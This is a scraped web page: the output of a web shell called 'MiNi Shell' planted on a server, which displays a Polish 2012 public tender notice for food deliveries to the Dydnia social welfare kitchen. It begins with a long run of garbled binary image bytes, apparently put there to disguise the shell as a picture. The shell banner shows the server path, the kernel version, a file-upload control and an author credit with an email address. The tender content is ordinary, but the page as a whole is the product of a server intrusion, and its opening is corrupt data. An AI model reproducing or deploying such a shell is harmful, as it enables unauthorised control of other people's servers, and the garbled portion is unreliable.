JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120820/305820-N-2012.html

<p class="kh_header"><b>Dydnia: Dostawa żywności do kuchni Gminnego Ośrodka Pomocy Społecznej w Dydni, mieszczącego się w budynku CARITAS Archidiecezji Przemyskiej, Stacja Opieki Medycznej, Centrum Pielęgniarstwa Rodzinnego w Dydni, w celu przygotowania posiłków dla dzieci przedszkolnych i młodzieży szkolnej oraz osób starszych i niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 305820 - 2012; data zamieszczenia: 20.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dydnia , Dydnia 224, 36-204 Dydnia, woj. podkarpackie, tel. 013 4303002, 4308154, faks 013 4303194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops-dydnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności do kuchni Gminnego Ośrodka Pomocy Społecznej w Dydni, mieszczącego się w budynku CARITAS Archidiecezji Przemyskiej, Stacja Opieki Medycznej, Centrum Pielęgniarstwa Rodzinnego w Dydni, w celu przygotowania posiłków dla dzieci przedszkolnych i młodzieży szkolnej oraz osób starszych i niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Dostawa żywności do kuchni Gminnego Ośrodka Pomocy Społecznej w Dydni, mieszczącego się w budynku CARITAS Archidiecezji Przemyskiej, Stacja Opieki Medycznej, Centrum Pielęgniarstwa Rodzinnego w Dydni, w celu przygotowania posiłków dla dzieci przedszkolnych i młodzieży szkolnej oraz osób starszych i niepełnosprawnych.
Zamawiający dopuszcza składanie ofert częściowych - liczba części 7.  Przedmiot zamówienia obejmuje niżej wymienione części określone cyfrą rzymską: 
Część I - Produkty mleczarskie; jaja kurze, dostawy w okresie 4 m-cy od podpisania umowy,
Część II - Świerze mięso wołowe, wieprzowe i przetwory z mięs; świeże mięso drobiowe, dostawy w okresie 4 m-cy od podpisania umowy,
Część IV - Art. ogólno spożywcze, dostawy w okresie 4 m-cy od podpisania umowy,
Część V - Zboża, ziemniaki, warzywa i owoce, dostawy w okresie 4 m-cy od podpisania umowy,
Część VII - Mąka zbożowa i podobne produkty; produkty z ziaren zbóż, dostawy w okresie 4 m-cy od podpisania umowy,
Część VIII - Oleje roślinne; tłuszcze zwierzęce, dostawy w okresie 4 m-cy od podpisania umowy,
Część IX - Żywność, napoje i produkty pokrewne; miód naturalny; ryby przetworzone i konserwowane, dostawy w okresie 4 m-cy od podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 03.14.25.00-3, 15.10.00.00-9, 15.11.21.30-6, 15.80.00.00-6, 03.20.00.00-3, 15.81.00.00-9, 15.61.20.00-1, 15.61.30.00-8, 15.41.11.00-3, 15.41.21.00-0, 15.00.00.00-8, 03.14.21.00-9, 15.20.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik Nr 9 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik Nr 9 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik Nr 9 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik Nr 9 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik Nr 9 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zetorzeszow.eu/ugdydnia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Dydni
Dydnia 224
36-204 Dydnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2012 godzina 11:00, miejsce: Urząd Gminy w Dydni, 
36-204 Dydnia 224,
pokój nr 102 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty mleczarskie; Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 18% 400g szt. 880
Masło extra 200g szt. 127
Jogurt Jogobella Zott 150g szt. 179
Jogurt Gratka 125g szt. 693
Mleko 3,2% szt. 334
Bita śmietana Bakoma szt. 4
Jaja kurze szt. 400
Ser trzebownisko kg 17,99
Ser złoty mazur kg 10
Serek Hochland Almette szt. 27.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świeże mięso wołowe, wieprzowe i przetwory z mięs; Świeże mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z kurczaka kg 174
Noga z kurczaka kg 129
Porcja rosołowa z kurczaka kg 687
Udko z kurczaka kg 42
Ćwiartka z kurczaka kg 7
Kurczak świeży kg 3
Kiełbasa krakowska kg 28
Kiełbasa śląska kg 34
Kiełbasa wiejska kg 24
Kiełbasa swojska kg 23
Szynka surowa B/K kg 14
Kiełbasa domowa kg 17
Kiełbasa drobiowa kg 15
Kiełbasa toruńska kg 36
Kiełbasa podwawelska kg 17
Kiełbasa z beczki kg 2,5
Żeberka kg 10
Boczek Duńczyk gotowany kg 71
Łopata WP B/K kg 68
Baleron kg 10
Karkówka kg 20
Ogonówka kg 3
Parówki drobiowe kg 12
Parówki babuni kg 47
Szynka polska kg 8
Mięso gulaszowe kg 25
Polędwica drobiowa kg 3
Polędwica z majerankiem kg 2
Mortadela kg 5
Schab kg 6
Pasztet drobiowy z pieczarkami szt. 35
Pasztet podlaski z drobiu szt. 22
Pasztet z kaczki szt. 6
Pasztet z indyka szt. 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.21.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Art. ogólno spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zupa ogórkowa Knorr 50g szt. 53
Zupa grzybowa Amino 40g szt. 44
Zupa borowikowa Knorr 53g szt. 32
Zupa ogonowa Amino 57g szt. 85
Zupa brokułowa Winiary 63g szt. 70
Barszcz czerwony Winiary Instant 50g szt. 83
Żurek Winiary 52g szt. 81
Barszcz biały Winiary 65g szt. 10
Zupa fasolowa Winiary 65g szt. 35
Zupa jarzynowa Winiary 48g szt. 70
Zupa pieczarkowa Winiary 45g szt. 97
Krupnik Polski Winiary 59g szt. 83
Zupa grochowa Winiary 75g szt. 34
Zupa cebulowa Knorr 31g szt. 21
Zupa kalafiorowa Winiary 47g szt. 10
Zupa gulaszowa Knorr 60g szt. 31
Zupa krem z kurek Knorr 59g szt. 19
Papryka słodka Appetita 20g szt. 25
Majeranek Prymat 8g szt. 100
Pietruszka susz Pak 20g szt. 100
Pieprz czarny mielony Appetita 20g szt. 97
Liść laurowy Prymat 6g szt.40
Ziele angielskie Prymat 15g szt. 41
Rosół z kury Knorr 180g szt. 124
Rosołek warzywny Knorr 60g szt. 74
Kostka mięsna Winiary 120g szt. 30
Bulion drob-warz Knorr 120g szt. 19
Kucharek 200g szt. 40
Kucharek 500g szt. 50
Ziarenka smaku drobiowe Winiary 200g szt. 10
Maga Winiary (1) 1l szt. 48
Przyprawa do żurku Appetita 20g szt. 22
Przyprawa do bigosu Appetita 20g szt. 23
Przyprawa z ogórków polan szt. 22
Kminek Appetita 20g szt. 26
Sól jodowana Edo 1kg szt. 5
Koper susz Pak 25g szt. 32
Czosnek Knorr 42g szt. 10
Sos pieczeniowy ciemny Amino 38g szt. 12
Makaron kolanka ozdobne Ponte (2) 500g, szt. 68
Makaron muszelka Ponte (2) 400g szt. 58
Makaron świderki Ponte (2) 500g szt. 66
Makaron wstążka ozdobna Ponte (2) 500g szt. 57
Makaron uszka Lubella 400g szt. 53
Makaron krajanka Lubella 400g szt. 2
Makaron domowy 4-jajeczny Lubella 250g szt. 11
Makaron spaghetti Lubella 500g szt. 10
Sos do spaghetti Pudliszki 500g szt. 10
Cukier 1kg szt. 45
Płatki śniadaniowe Cookie Cripps 550g szt. 3
Płatki śniadaniowe Cookie Cripps 225g szt. 2
Płatki śniadaniowe Corn Flakes 750g szt. 4
Płatki śniadaniowe Corn Flakes 250g szt. 15
Płatki śniadaniowe Chocapik Duo 460g szt. 11
Płatki śniadaniowe Mlekołaki Lubella 250g szt. 3
Płatki Nesquik Nestle 250g szt. 2
Płatki Nesquik Nestle 500g szt. 2
Bułka tarta 450g szt. 8
Kwasek cytrynowy Gellwe 20g szt. 6
Krem orzech-czek. Nutella 200g szt. 10
Kakao Puchatek 500g szt. 5
Budyń śmietankowy Delecta 65g szt. 11
Budyń czekoladowy Delecta 65g szt. 5
Budyń waniliowy Delecta 65g szt. 12
Budyń malinowy Delecta 65g szt. 5
Sos sałatkowy francuski Knorr 9g szt. 5
Herbata Saga ekspres 100t szt. 3
Herbata Saga owocowa ekspres 30t szt. 4
Kisiel truskawkowy Delecta 58g szt. 6
Kisiel cytrynowy Delecta 58g szt. 5
Kisiel poziomkowy Delecta 58g szt. 6
Kisiel wiśniowy Delecta 58g szt. 7
Wafelek Grześki orzechowe Goplana 39g szt. 40
Wafelek Prince Polo XXL Clasic Olza 52g szt. 30
Wafelek Góralki mleczny 50g szt. 80
Wafelek kakaowy Anusie 50g szt. 39
Batonik Pawełek toffi Wedel 45g szt. 60
Ketchup Roleski łagodny 450g szt. 8
Cukier puder Kupiec 400g szt. 1
Drożdże domowe kostka 100g szt. 4
Cukier waniliowy Delecta 32g szt. 3
Majonez Rzymski Fructus 850g szt. 3
Przyprawa do kurczaka Knorr 25g szt. 5
Galaretka pomarańczowa Delecta 79g szt. 8
Galaretka agrestowa  Delecta 79g szt. 10
Posypka czekoladowa Dr. Oetker 80g szt. 2
Sos pieczarkowy  Winiary 34g szt. 3
Ciastka łakotki kg 3
Kawa zbożowa Anatol Delecta 20t szt. 3
Ciastka słonko nadziewane kg 2
Ciastka adwokatki kg 1,5
Ciastka orzechowiec kg 1,1
Czekoladki malaga kg 1,5
Cukierki kasztankowe kg 2
Ocet kulinarny spirytusowy 10% szt. 2
Fasola biała drobna  Kupiec 400g szt. 39
Groch łuskany połówki Kupiec 400g szt. 41
Rodzynki Kresto 100g szt. 2
(1) zamiennie maga Knorr 1l, po wcześniejszym uzgodnieniu z Zamawiającym  
(2) zamiennie makarony Lubella 500g, 400g, po wcześniejszym uzgodnieniu z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zboża, ziemniaki, warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banan kg 93
Ziemniaki kg 350
Marchewka kg 165
Cebula kg 34
Czosnek kg 4
Seler kg 51
Por szt. 28
Pieczarki luz kg 72
Koper pęczek szt. 5
Natka pietruszki pęczek szt. 90
Kapusta biała kg 115
Buraki luz kg 31
Fasola jaś kg 63
Jabłka deserowe kg 600
Pomarańcze kg 90
Papryka czerwona kg 16
Papryka żółta kg 2
Papryka zielona kg 2
Nektarynka kg 8
Śliwa luz kg 10
Pomidor kg 4
Kapusta pekińska szt. 4
Ogórek szklarniowy kg 2
Cytryna kg 2
Brzoskwinia  kg 9
Winogrono białe kg 1
Kiwi  kg 3
Klementynka kg 5
Gruszka kg 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mąka zbożowa i podobne produkty; Produkty z ziaren zbóż.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka poznańska* 1kg szt. 120
Mąka ziemniaczana Kupiec 500g szt. 5
Ryż biały Impak 1kg szt. 119
Kasza jęczmienna gruba Edo 500g szt. 104
Kasza gryczana prażona Kupiec 400g szt. 10
Kasza manna błyskawiczna Kupiec 400g szt. 2
* zamiennie mąka wrocławska 1kg, po wcześniejszym uzgodnieniu z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.20.00-1, 15.61.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Oleje roślinne; Tłuszcze zwierzęce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej Kujawski 3l szt. 3
Olej Kujawski 1l szt. 10
Olej rzepakowy 1l szt. 12
Olej Bartek 1l szt. 8
Smalec kostka AGI 200g szt. 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.11.00-3, 15.41.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Żywność, napoje i produkty pokrewne; Miód naturalny; Ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sok Tymbark 200ml szt. 1420
Napój Nappi multiwitamina 200ml szt. 1 120
Sok Cappy pomarańczowy 200ml szt. 990
Sok Pysio 300ml szt. 1440
Przecier ogórkowy Polan 350g szt. 49
Koncentrat barszczu Krakus 300ml szt. 30
Kapusta kiszona - wiadro 5kg szt. 14
Ogórki konserwowe Orzech 870g szt. 45
Koncentrat pomidorowy 30% Fruktus(1) 950g szt. 115
Groszek konserwowy Pektowin(2) 400g szt. 40
Żur naturalny Vortumnus 350g szt. 55
Sałatka wielowarzywna obiadowa Orzech 900ml szt. 15
Sałatka szwedzka Vortumnus 900ml szt. 18
Sok Hortex vitam. 1l szt. 4
Sok Caprio owocowy 2l szt. 5
Buraczki zasmażane Provitus 480g szt. 8
Marchew zasmażana Provitus 480g szt. 8
Sok Kubuś multiwitamina 750ml szt. 100
Dżem wiśniowy Łowicz 300g szt. 8
Dżem brzoskwiniowy Łowicz 300g szt. 8
Dżem truskawkowy Łowicz 300g szt. 14
Dżem leśny Łowicz 300g szt. 2
Kapusta kiszona worek 1kg szt. 17
Nektar marchwiowy przysmak Smakotek 0,75l szt. 6
Filet z makreli w sosie pomidorowym EVA 170g szt. 16
Miód naturalny Bartnik 400g szt. 3
(1) zamiennie koncentrat Vortumnus 950g, po wcześniejszym uzgodnieniu z Zamawiającym
(2) zamiennie groszek konserwowy Słoneczny Ogród 400g, po wcześniejszym uzgodnieniu z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.14.21.00-9, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com